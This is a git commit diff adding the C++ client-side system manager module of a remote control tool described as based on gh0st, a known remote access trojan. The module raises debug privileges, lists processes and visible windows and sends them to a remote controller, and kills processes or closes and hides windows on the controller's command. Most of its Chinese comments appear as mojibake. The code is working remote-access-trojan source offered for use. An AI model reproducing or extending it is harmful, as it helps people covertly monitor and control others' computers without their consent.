基于gh0st的远程控制器

实现了终端管理、进程管理、窗口管理、桌面管理、文件管理、语音管理、视频管理、服务管理、注册表管理等功能。
2019-01-05 20:21:43 +08:00
parent 3a66916242
commit 27fcb6284e
136 changed files with 33399 additions and 0 deletions
--- a/client/SystemManager.cpp
+++ b/client/SystemManager.cpp
@@ -0,0 +1,279 @@
+// SystemManager.cpp: implementation of the CSystemManager class.
+//
+//////////////////////////////////////////////////////////////////////
+
+#include "stdafx.h"
+#include "SystemManager.h"
+#include "Common.h"
+#include <IOSTREAM>
+using namespace std;
+#include <TLHELP32.H>
+#include <Psapi.h>
+
+#pragma comment(lib,"psapi.lib")
+
+enum                  
+{
+	COMMAND_WINDOW_CLOSE,   //<2F>رմ<D8B1><D5B4><EFBFBD>
+	COMMAND_WINDOW_TEST,    //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+};
+//////////////////////////////////////////////////////////////////////
+// Construction/Destruction
+//////////////////////////////////////////////////////////////////////
+
+CSystemManager::CSystemManager(IOCPClient* ClientObject,BOOL bHow):CManager(ClientObject)
+{
+	if (bHow==COMMAND_SYSTEM)
+	{
+		//<2F><><EFBFBD><EFBFBD>
+		SendProcessList();
+	}
+	else if (bHow==COMMAND_WSLIST)
+	{
+		//<2F><><EFBFBD><EFBFBD>
+		SendWindowsList(); 
+	}
+}
+
+VOID CSystemManager::SendProcessList()
+{
+	LPBYTE	szBuffer = GetProcessList();            //<2F>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>б<EFBFBD><D0B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+	if (szBuffer == NULL)
+		return;	
+	m_ClientObject->OnServerSending((char*)szBuffer, LocalSize(szBuffer));  
+	LocalFree(szBuffer);
+
+	szBuffer = NULL;
+}
+
+void CSystemManager::SendWindowsList()
+{
+	LPBYTE	szBuffer = GetWindowsList();          //<2F>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>б<EFBFBD><D0B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+	if (szBuffer == NULL)
+		return;
+
+	m_ClientObject->OnServerSending((char*)szBuffer, LocalSize(szBuffer));    //<2F><><EFBFBD><EFBFBD><EFBFBD>ض˷<D8B6><CBB7>͵õ<CDB5><C3B5>Ļ<EFBFBD><C4BB><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD>ͷ<EFBFBD><CDB7><EFBFBD><EFBFBD><EFBFBD>
+	LocalFree(szBuffer);	
+}
+
+LPBYTE CSystemManager::GetProcessList()
+{
+	DebugPrivilege(SE_DEBUG_NAME,TRUE);     //<2F><>ȡȨ<C8A1><C8A8>
+
+	HANDLE          hProcess  = NULL;
+	HANDLE			hSnapshot = NULL;
+	PROCESSENTRY32	pe32 = {0};
+	pe32.dwSize = sizeof(PROCESSENTRY32);
+	char			szProcessFullPath[MAX_PATH] = {0};
+	hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
+
+	DWORD           dwOffset = 0;
+	DWORD           dwLength = 0;
+	DWORD			cbNeeded = 0;
+	HMODULE			hModules = NULL;   //<2F><><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>һ<EFBFBD><D2BB>ģ<EFBFBD><C4A3><EFBFBD>ľ<EFBFBD><C4BE><EFBFBD>
+
+	LPBYTE szBuffer = (LPBYTE)LocalAlloc(LPTR, 1024);       //<2F><>ʱ<EFBFBD><CAB1><EFBFBD><EFBFBD>һ<EFBFBD>»<EFBFBD><C2BB><EFBFBD><EFBFBD><EFBFBD>
+
+	szBuffer[0] = TOKEN_PSLIST;                      //ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͷ 
+	dwOffset = 1;
+
+	if(Process32First(hSnapshot, &pe32))             //<2F>õ<EFBFBD><C3B5><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD>ж<EFBFBD>һ<EFBFBD><D2BB>ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
+	{	  
+		do
+		{      
+			//<2F>򿪽<EFBFBD><F2BFAABD>̲<EFBFBD><CCB2><EFBFBD><EFBFBD>ؾ<EFBFBD><D8BE><EFBFBD>
+			hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 
+				FALSE, pe32.th32ProcessID);   //<2F><><EFBFBD><EFBFBD>Ŀ<EFBFBD><C4BF><EFBFBD><EFBFBD><EFBFBD><EFBFBD>  
+
+			//	if ((pe32.th32ProcessID !=0) && 
+			//		(pe32.th32ProcessID !=4))
+			{
+				//ö<>ٵ<EFBFBD>һ<EFBFBD><D2BB>ģ<EFBFBD><C4A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҳ<EFBFBD><D2B2><EFBFBD>ǵ<EFBFBD>ǰ<EFBFBD><C7B0><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
+				EnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded);
+				//<2F>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+				DWORD dwReturn = GetModuleFileNameEx(hProcess, hModules, 
+					szProcessFullPath, 
+					sizeof(szProcessFullPath));
+
+				if (dwReturn==0)
+				{
+					strcpy(szProcessFullPath,"");
+				}
+
+				//<2F><>ʼ<EFBFBD><CABC><EFBFBD><EFBFBD>ռ<EFBFBD>õĻ<C3B5><C4BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ǹ<EFBFBD><C7B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ķ<EFBFBD><C4B7>͵<EFBFBD><CDB5><EFBFBD><EFBFBD>ݽṹ
+				// <20>˽<EFBFBD><CBBD><EFBFBD>ռ<EFBFBD><D5BC><EFBFBD><EFBFBD><EFBFBD>ݴ<EFBFBD>С
+				dwLength = sizeof(DWORD) + 
+					lstrlen(pe32.szExeFile) + lstrlen(szProcessFullPath) + 2;
+				// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̫С<CCAB><D0A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD><EFBFBD>
+				if (LocalSize(szBuffer) < (dwOffset + dwLength))
+					szBuffer = (LPBYTE)LocalReAlloc(szBuffer, (dwOffset + dwLength),
+					LMEM_ZEROINIT|LMEM_MOVEABLE);
+
+				//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>memcpy<70><79><EFBFBD><EFBFBD><EFBFBD>򻺳<EFBFBD><F2BBBAB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>ݽṹ<DDBD><E1B9B9> 
+				//<2F><><EFBFBD><EFBFBD>ID+<2B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>+0+<2B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>+0  <20><><EFBFBD><EFBFBD>
+				//<2F><>Ϊ<EFBFBD>ַ<EFBFBD><D6B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>0 <20><>β<EFBFBD><CEB2>
+				memcpy(szBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
+				dwOffset += sizeof(DWORD);	
+
+				memcpy(szBuffer + dwOffset, pe32.szExeFile, lstrlen(pe32.szExeFile) + 1);
+				dwOffset += lstrlen(pe32.szExeFile) + 1;
+
+				memcpy(szBuffer + dwOffset, szProcessFullPath, lstrlen(szProcessFullPath) + 1);
+				dwOffset += lstrlen(szProcessFullPath) + 1;
+			}
+		}
+		while(Process32Next(hSnapshot, &pe32));      //<2F><><EFBFBD><EFBFBD><EFBFBD>õ<EFBFBD><C3B5><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+	}
+
+	DebugPrivilege(SE_DEBUG_NAME,FALSE);  //<2F><>ԭ<EFBFBD><D4AD>Ȩ
+	CloseHandle(hSnapshot);       //<2F>ͷž<CDB7><C5BE><EFBFBD> 
+	return szBuffer;
+}
+
+CSystemManager::~CSystemManager()
+{
+	cout<<"ϵͳ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>"<<endl;
+}
+
+BOOL CSystemManager::DebugPrivilege(const char *szName, BOOL bEnable)
+{
+	BOOL              bResult = TRUE;
+	HANDLE            hToken;
+	TOKEN_PRIVILEGES  TokenPrivileges;
+
+	//<2F><><EFBFBD><EFBFBD> Token <20><><EFBFBD><EFBFBD>
+	if (!OpenProcessToken(GetCurrentProcess(), 
+		TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
+	{
+		bResult = FALSE;
+		return bResult;
+	}
+	TokenPrivileges.PrivilegeCount = 1;
+	TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
+
+	LookupPrivilegeValue(NULL, szName, &TokenPrivileges.Privileges[0].Luid);
+	AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
+	if (GetLastError() != ERROR_SUCCESS)
+	{
+		bResult = FALSE;
+	}
+
+	CloseHandle(hToken);
+	return bResult;	
+}
+
+VOID  CSystemManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
+{
+	switch(szBuffer[0])
+	{
+	case COMMAND_PSLIST:
+		{
+			SendProcessList();
+			break;
+		}
+	case COMMAND_KILLPROCESS:
+		{			
+			KillProcess((LPBYTE)szBuffer + 1, ulLength - 1);			
+			break;
+		}	
+	case COMMAND_WSLIST:
+		{
+			SendWindowsList();
+			break;
+		}
+
+	case COMMAND_WINDOW_CLOSE:
+		{
+			HWND hWnd = *((HWND*)(szBuffer+1));
+
+			::PostMessage(hWnd,WM_CLOSE,0,0); 
+
+			Sleep(100);
+			SendWindowsList(); 
+
+			break;
+		}
+	case COMMAND_WINDOW_TEST:    //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+		{
+			TestWindow(szBuffer+1);  	
+			break;
+		}		
+	default:
+		{		
+			break;
+		}
+	}
+}
+
+void CSystemManager::TestWindow(LPBYTE szBuffer)    //<2F><><EFBFBD>ڵ<EFBFBD><DAB5><EFBFBD><EFBFBD><EFBFBD> <20><>С <20><><EFBFBD>ض<EFBFBD><D8B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ﴦ<EFBFBD><EFB4A6>
+{
+	DWORD Hwnd;
+	DWORD dHow;
+	memcpy((void*)&Hwnd,szBuffer,sizeof(DWORD));            //<2F>õ<EFBFBD><C3B5><EFBFBD><EFBFBD>ھ<EFBFBD><DABE><EFBFBD>
+	memcpy(&dHow,szBuffer+sizeof(DWORD),sizeof(DWORD));     //<2F>õ<EFBFBD><C3B5><EFBFBD><EFBFBD>ڴ<EFBFBD><DAB4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+	ShowWindow((HWND__ *)Hwnd,dHow);
+	//<2F><><EFBFBD>ھ<EFBFBD><DABE><EFBFBD> <20><>ɶ(<28><> С <20><><EFBFBD><EFBFBD> <20><>ԭ)
+}
+
+VOID CSystemManager::KillProcess(LPBYTE szBuffer, UINT ulLength)
+{
+	HANDLE hProcess = NULL;
+	DebugPrivilege(SE_DEBUG_NAME, TRUE);  //<2F><>Ȩ
+
+	for (int i = 0; i < ulLength; i += 4)
+		//<2F><>Ϊ<EFBFBD><CEAA><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD><C4BF>ܸ<EFBFBD><DCB8><EFBFBD>ֹ<EFBFBD><D6B9>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+	{
+		//<2F>򿪽<EFBFBD><F2BFAABD><EFBFBD>
+		hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, *(LPDWORD)(szBuffer + i));
+		//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+		TerminateProcess(hProcess, 0);
+		CloseHandle(hProcess);
+	}
+	DebugPrivilege(SE_DEBUG_NAME, FALSE);    //<2F><>ԭ<EFBFBD><D4AD>Ȩ
+	// <20><><EFBFBD><EFBFBD>Sleep<65>£<EFBFBD><C2A3><EFBFBD>ֹ<EFBFBD><D6B9><EFBFBD><EFBFBD>
+	Sleep(100);
+}
+
+LPBYTE CSystemManager::GetWindowsList()
+{
+	LPBYTE	szBuffer = NULL;  //char* p = NULL   &p
+	EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&szBuffer);  //ע<>ắ<EFBFBD><E1BAAF>
+	//<2F><><EFBFBD><EFBFBD>API<50><49><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>к<EFBFBD><D0BA><EFBFBD>ָ<EFBFBD><D6B8><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 
+	//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵͳע<CDB3><D7A2>һ<EFBFBD><D2BB> <20>ص<EFBFBD><D8B5><EFBFBD><EFBFBD><EFBFBD>
+
+	szBuffer[0] = TOKEN_WSLIST;
+	return szBuffer;  	
+}
+
+BOOL CALLBACK CSystemManager::EnumWindowsProc(HWND hWnd, LPARAM lParam)  //Ҫ<><D2AA><EFBFBD><EFBFBD> **
+{
+	DWORD	dwLength = 0;
+	DWORD	dwOffset = 0;
+	DWORD	dwProcessID = 0;
+	LPBYTE	szBuffer = *(LPBYTE *)lParam;  
+
+	char	szTitle[1024];
+	memset(szTitle, 0, sizeof(szTitle));
+	//<2F>õ<EFBFBD>ϵͳ<CFB5><CDB3><EFBFBD>ݽ<EFBFBD><DDBD><EFBFBD><EFBFBD>Ĵ<EFBFBD><C4B4>ھ<EFBFBD><DABE><EFBFBD><EFBFBD>Ĵ<EFBFBD><C4B4>ڱ<EFBFBD><DAB1><EFBFBD>
+	GetWindowText(hWnd, szTitle, sizeof(szTitle));
+	//<2F><><EFBFBD><EFBFBD><EFBFBD>ж<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7>ɼ<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA>
+	if (!IsWindowVisible(hWnd) || lstrlen(szTitle) == 0)
+		return true;
+	//ͬ<><CDAC><EFBFBD>̹<EFBFBD><CCB9><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>ķ<EFBFBD><C4B7>͵<EFBFBD><CDB5><EFBFBD><EFBFBD>ض˵<D8B6><CBB5><EFBFBD><EFBFBD>ݽṹ
+
+	if (szBuffer == NULL)
+		szBuffer = (LPBYTE)LocalAlloc(LPTR, 1);  //<2F><>ʱ<EFBFBD><CAB1><EFBFBD>仺<EFBFBD><E4BBBA><EFBFBD><EFBFBD> 
+
+	//[<5B><>Ϣ][4Notepad.exe\0]
+	dwLength = sizeof(DWORD) + lstrlen(szTitle) + 1;
+	dwOffset = LocalSize(szBuffer);  //1
+	//<2F><><EFBFBD>¼<EFBFBD><C2BC>㻺<EFBFBD><E3BBBA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С
+	szBuffer = (LPBYTE)LocalReAlloc(szBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
+	//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>memcpy<70><79><EFBFBD>ܿ<EFBFBD><DCBF><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݽṹΪ hwnd+<2B><><EFBFBD>ڱ<EFBFBD><DAB1><EFBFBD>+0
+	memcpy((szBuffer+dwOffset),&hWnd,sizeof(DWORD));
+	memcpy(szBuffer + dwOffset + sizeof(DWORD), szTitle, lstrlen(szTitle) + 1);
+
+	*(LPBYTE *)lParam = szBuffer;
+
+	return true;
+}